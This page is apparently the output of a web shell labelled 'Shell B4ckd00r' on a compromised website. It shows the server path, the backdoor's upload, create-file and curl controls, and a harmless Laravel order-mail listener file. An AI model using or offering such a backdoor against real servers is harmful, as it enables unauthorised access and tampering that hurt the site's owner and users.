Shell B4ckd00r
Current Dir :
/
home
/
u789730693
/
domains
/
piorasplash.com
/
public_html
/
app
/
Listeners
/
Home
Upload
Create Dir
Create File
Curl
Current File : /home/u789730693/domains/piorasplash.com/public_html/app/Listeners/SendOrderMailNotification.php
<?php namespace App\Listeners; use App\Events\SendOrderMail; use App\Services\OrderMailNotificationBuilder; use Illuminate\Support\Facades\Log; class SendOrderMailNotification { public function handle(SendOrderMail $event) { try{ $orderMailNotificationBuilderService = new OrderMailNotificationBuilder($event->info['order_id'], $event->info['status']); $orderMailNotificationBuilderService->send(); } catch(\Exception $e) { Log::info($e->getMessage()); } } }
v.01